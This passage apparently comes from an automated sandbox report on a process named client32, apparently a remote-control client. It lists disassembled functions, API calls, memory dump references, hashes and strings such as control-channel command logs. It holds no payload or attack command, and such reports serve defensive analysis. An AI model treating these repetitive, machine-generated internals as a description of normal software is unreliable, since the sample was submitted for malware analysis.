                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$DispatchItemTranslate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1381171329-0
                                                                                                                                                                                                    • Opcode ID: 9bbe141cbcae0986ab8e1a5d19c673565b62793078cbe47edbac0050ed91c493
                                                                                                                                                                                                    • Instruction ID: 4970fc911a0e855f64a3d9e647d9240b716c91892a3758399f36bf61488b9f97
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9bbe141cbcae0986ab8e1a5d19c673565b62793078cbe47edbac0050ed91c493
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6421AE71E0030B6BEB21DA65CC85FAFB3FCAB44708F904469EA1792180FB75E401CB95
                                                                                                                                                                                                    Function 11023370 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023387
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00001399), ref: 110233C1
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110233DA
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110233E4
                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023426
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$DispatchItemTranslate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1381171329-0
                                                                                                                                                                                                    • Opcode ID: 1eedb8004f846199553b9819b36fcc4fba7ec9623a11643e01901e57e73e0ceb
                                                                                                                                                                                                    • Instruction ID: 550a142869b4f1c1193fc2f7bd4fc6518863fc800a3782c30ff24b2ab7768c02
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1eedb8004f846199553b9819b36fcc4fba7ec9623a11643e01901e57e73e0ceb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0721A175E0430B6BD711DF65CC85BAFB3ACAB48308F808469EA5296280FF74F501CB91
                                                                                                                                                                                                    Function 68858B00 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileType.KERNEL32(?,?,?,68858C18,0000000C), ref: 68858B34
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,68858C18,0000000C), ref: 68858B3E
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000,?,?,68858C18,0000000C), ref: 68858B45
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,68858C18,0000000C), ref: 68858B75
                                                                                                                                                                                                    • __doserrno.MSVCR100(?,?,68858C18,0000000C), ref: 68858B80
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFileLastType__doserrno__dosmaperr_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3203400888-0
                                                                                                                                                                                                    • Opcode ID: e96fc777e2e611abf7f1415a0520c9c671fe8d3e0d31d920cd1b33a2369109ea
                                                                                                                                                                                                    • Instruction ID: f107717a4ba7a340d1609286be81286059161e51e2407b74b93c665a229f0af1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e96fc777e2e611abf7f1415a0520c9c671fe8d3e0d31d920cd1b33a2369109ea
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D2145B159120C9FDF518F68C9493AEBB64BF42328F988A46E4708F1E2DB358151DF93
                                                                                                                                                                                                    Function 1103D0B0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 68sleepCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4,00000000,?), ref: 1103D0E1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                    • String ID: /weblock.htm$:%u$@r$redirect:http://127.0.0.1
                                                                                                                                                                                                    • API String ID: 3472027048-1140565742
                                                                                                                                                                                                    • Opcode ID: 73219fc91a885bec8c3d53282fd7fd25bd90ae77e27c8345a4b14af61fd7c86f
                                                                                                                                                                                                    • Instruction ID: 53e0b3806bd00902e3668edf75962450fe0504f4029adcdddc47de674a55a881
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73219fc91a885bec8c3d53282fd7fd25bd90ae77e27c8345a4b14af61fd7c86f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D11B975F0112EEFFB11DBA4DC40FBEF7A99B41709F0141E9ED1997280DA616D0187A2
                                                                                                                                                                                                    Function 687F0A97 Relevance: 7.6, APIs: 5, Instructions: 62COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcsnicoll_l.MSVCR100(?,?,?,00000000), ref: 687F0AB5
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 6880C7B6
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 6880C7C1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo_wcsnicoll_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1358483507-0
                                                                                                                                                                                                    • Opcode ID: db7db4b3d559d65b45bd892e583bcb40bfa7a01bb561a55a468ba0db1de8c364
                                                                                                                                                                                                    • Instruction ID: c78d4f76e7abea7fec63f66dea73c234c2872ed1958ce1ba71b7624c70a1aba7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: db7db4b3d559d65b45bd892e583bcb40bfa7a01bb561a55a468ba0db1de8c364
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12110676540159DBDF344E9DCC4437936E2AB02361FD04D2AF8749A792DB38C840E3B6
                                                                                                                                                                                                    Function 1103F120 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1103F000: DeleteObject.GDI32(?), ref: 1103F0EB
                                                                                                                                                                                                    • CreateRectRgnIndirect.GDI32(?), ref: 1103F168
                                                                                                                                                                                                    • CombineRgn.GDI32(?,?,00000000,00000002), ref: 1103F17C
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 1103F183
                                                                                                                                                                                                    • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1103F1A6
                                                                                                                                                                                                    • CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1103F1BD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CombineCreateDeleteObjectRect$Indirect
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3044651595-0
                                                                                                                                                                                                    • Opcode ID: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
                                                                                                                                                                                                    • Instruction ID: 27b6d86d25d7e193214482d66684a995ae6d2575b2198652133f57a3d860c4fb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26116031A50702AFE721CE64D888B9AF7ECFB45716F00812EE66992180C770B881CB93
                                                                                                                                                                                                    Function 687EC84A Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6881079E
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 688107AA
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 688107B2
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 688107BA
                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 688107C6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1445889803-0
                                                                                                                                                                                                    • Opcode ID: 44a9b8e3babb791ac26add906afda3500939542431725633261c02977db4ac84
                                                                                                                                                                                                    • Instruction ID: 4ca444574fdf7edc74cfcf2f10ce050912ffd82d0c680e6810c7e4df450b8505
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44a9b8e3babb791ac26add906afda3500939542431725633261c02977db4ac84
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 001170B6D042259BDF109BFCC94899EF7F8EB4A361F920961D465E7600EB719940CB90
                                                                                                                                                                                                    Function 687EAA39 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0,?,687EB911), ref: 687EAA51
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0,?,687EB911), ref: 687EAA5E
                                                                                                                                                                                                    • _msize.MSVCR100(00000000,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687EAA7B
                                                                                                                                                                                                      • Part of subcall function 687E25DA: HeapSize.KERNEL32(00000000,00000000,?,687EAA80,00000000,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?), ref: 687E25F4
                                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687EAA97
                                                                                                                                                                                                    • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687EAA9F
                                                                                                                                                                                                    • _realloc_crt.MSVCR100(00000000,00000800,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687F283A
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687F2850
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 765448609-0
                                                                                                                                                                                                    • Opcode ID: 7f77484cfba3de844723b0be94e10ba707c01e77873f86cf5bf4f6e1e10a7e46
                                                                                                                                                                                                    • Instruction ID: f4cae4d0cb9f9839ff55704d073f4b4e11395d1fa81c4cb5850db61726c352ae
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f77484cfba3de844723b0be94e10ba707c01e77873f86cf5bf4f6e1e10a7e46
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37F04976510219ABDB019F79CD84489BBDAFB495603514536E509E3211DB71EC41CBE4
                                                                                                                                                                                                    Function 687E29D4 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR100(?,687E238F,?,?,?,00000000,?), ref: 688093B8
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(?,687E238F,?,?,?,00000000,?), ref: 688093C3
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,687E238F,?,?,?,00000000,?), ref: 688093CD
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 688093E4
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(?,?,687E238F,?,?,?,00000000,?), ref: 688093EF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    • Opcode ID: a6abe8e5a0b4922423dae7bb26b678e5c2fdbbdbe39903aceb750149090a0a8a
                                                                                                                                                                                                    • Instruction ID: 47f4688076765927875d133ebfc69b8b4746f039fea3dd9bfc10c9d47ffc1ccf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6abe8e5a0b4922423dae7bb26b678e5c2fdbbdbe39903aceb750149090a0a8a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3001A47145060AEBCB211FBCCD487AA3B94AF06338FC15A16F938561E0DBB58560DBF2
                                                                                                                                                                                                    Function 11057380 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 375windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • PostMessageA.USER32(0007036E,00000501,00000000,00000000), ref: 11057461
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Warning. Eval period expired - ignoring cmd %d (x%x) - idata %x - VistaUI %d, xrefs: 110574EA
                                                                                                                                                                                                    • Warning. DoNotify(%d) not processed, xrefs: 1105835B
                                                                                                                                                                                                    • Unable to select/accept connection within 10sec, ignoring cmd %d, xrefs: 1105747B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                                                                    • String ID: Unable to select/accept connection within 10sec, ignoring cmd %d$Warning. DoNotify(%d) not processed$Warning. Eval period expired - ignoring cmd %d (x%x) - idata %x - VistaUI %d
                                                                                                                                                                                                    • API String ID: 410705778-2398254728
                                                                                                                                                                                                    • Opcode ID: ba57e33ba6e0677790ef1c60b987477872059b8d4379fee97220d80381384bfa
                                                                                                                                                                                                    • Instruction ID: 05798701b428304c80057879d977071bcb7a017165537b33727636eef533cf84
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba57e33ba6e0677790ef1c60b987477872059b8d4379fee97220d80381384bfa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DD10975E0064A9BDB94CF95D880BAEF7B5FB84328F5082BEDD1557380EB356940CBA0
                                                                                                                                                                                                    Function 1101B1E0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 195COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110DC630: EnterCriticalSection.KERNEL32(111E9064,11018545,24DE4E77,?,?,?,1117A7A8,000000FF), ref: 110DC631
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 1101B426
                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1101B441
                                                                                                                                                                                                      • Part of subcall function 11008D80: std::_Xinvalid_argument.LIBCPMT ref: 11008D9A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B399
                                                                                                                                                                                                    • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B3BA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
